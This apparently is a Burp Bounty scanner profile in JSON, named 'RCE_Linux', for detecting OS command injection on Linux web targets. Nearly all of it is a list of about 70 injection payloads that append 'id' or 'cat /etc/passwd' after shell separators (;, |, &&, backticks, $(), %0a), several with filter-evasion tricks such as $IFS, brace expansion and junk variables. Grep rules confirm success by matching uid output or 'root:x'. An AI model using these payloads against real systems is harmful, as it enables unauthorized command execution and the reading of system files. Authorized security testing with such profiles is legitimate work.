[
  {
    "ProfileName": "RCE_Linux",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@burpbounty",
    "Payloads": [
      "true, || id",
      "true, | id",
      "true, ; id",
      "true, \u0026\u0026 id",
      "true, \u0026 id",
      "true, `id`",
      "true, ;cat%20/etc/passwd",
      "true, ;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      "true, ;cat$u /etc$u/passwd$u",
      "true, ;{cat,/etc/passwd}",
      "true, ;cat\u003c/etc/passwd",
      "true, ;cat$IFS/etc/passwd",
      "true, ;echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      "true, ;/usr/bin/id;",
      "true, |cat%20/etc/passwd",
      "true, |cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      "true, |cat$u /etc$u/passwd$u",
      "true, |{cat,/etc/passwd}",
      "true, |cat\u003c/etc/passwd",
      "true, |cat$IFS/etc/passwd",
      "true, |echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      "true, |/usr/bin/id|",
      "true, ||cat%20/etc/passwd",
      "true, ||cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      "true, ||cat$u /etc$u/passwd$u",
      "true, ||{cat,/etc/passwd}",
      "true, ||cat\u003c/etc/passwd",
      "true, ||cat$IFS/etc/passwd",
      "true, ||echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      "true, ||/usr/bin/id||",
      "true, \u0026\u0026cat%20/etc/passwd",
      "true, \u0026\u0026cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      "true, \u0026\u0026cat$u /etc$u/passwd$u",
      "true, \u0026\u0026{cat,/etc/passwd}",
      "true, \u0026\u0026cat\u003c/etc/passwd",
      "true, \u0026\u0026cat$IFS/etc/passwd",
      "true, \u0026\u0026echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      "true, \u0026\u0026/usr/bin/id\u0026\u0026",
      "true, \u0026cat%20/etc/passwd",
      "true, \u0026cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      "true, \u0026cat$u /etc$u/passwd$u",
      "true, \u0026{cat,/etc/passwd}",
      "true, \u0026cat\u003c/etc/passwd",
      "true, \u0026cat$IFS/etc/passwd",
      "true, \u0026echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      "true, \u0026/usr/bin/id\u0026",
      "true, %0acat%20/etc/passwd",
      "true, %0acat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      "true, %0acat$u /etc$u/passwd$u",
      "true, %0a{cat,/etc/passwd}",
      "true, %0acat\u003c/etc/passwd",
      "true, %0acat$IFS/etc/passwd",
      "true, %0aecho${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      "true, %0a/usr/bin/id%0a",
      "true, `cat%20/etc/passwd`",
      "true, `cat /e${hahaha}tc/${heywaf}pas${catchthis}swd`",
      "true, `cat$u /etc$u/passwd$u`",
      "true, `{cat,/etc/passwd}`",
      "true, `cat\u003c/etc/passwd`",
      "true, `cat$IFS/etc/passwd`",
      "true, `echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd`",
      "true, `/usr/bin/id`",
      "true, $(cat%20/etc/passwd)",
      "true, $(cat /e${hahaha}tc/${heywaf}pas${catchthis}swd)",
      "true, $(cat$u /etc$u/passwd$u)",
      "true, $({cat,/etc/passwd})",
      "true, $(cat\u003c/etc/passwd)",
      "true, $(cat$IFS/etc/passwd)",
      "true, $(echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd)",
      "true, $(/usr/bin/id)"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,(uid|gid|groups)\u003d[0-9]+\\(.+?\\)",
      "true,Or,root:x"
    ],
    "Tags": [
      "All",
      "RCE"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "isHeaderValue": false,
    "sequence": false,
    "NewHeaders": [],
    "MatchType": 2,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 3,
    "requestType": 1,
    "rawRequest": "",
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "RCE_Linux",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "Thanks to \"AnonLife\": @hacktivist1337 for the response regex :)\n\u003cbr/\u003e\nREFERENCES:\u003cbr/\u003e\u003cbr/\u003e\n* https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection\u003cbr/\u003e\u003cbr/\u003e\n* https://portswigger.net/web-security/os-command-injection\u003cbr/\u003e\u003cbr/\u003e\n\n\u003cbr/\u003e\u003cbr/\u003e- PAYLOAD: \u003cbr/\u003e\u003cpayload\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n- GREP: \u003cbr/\u003e\u003cgrep\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      70,
      80,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      21,
      31,
      41,
      51,
      61,
      71,
      72,
      73,
      74,
      75,
      76,
      77,
      36,
      81,
      82
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false,
    "changeHttpRequest": false,
    "showIssue": false,
    "changeHttpRequestType": 1
  }
]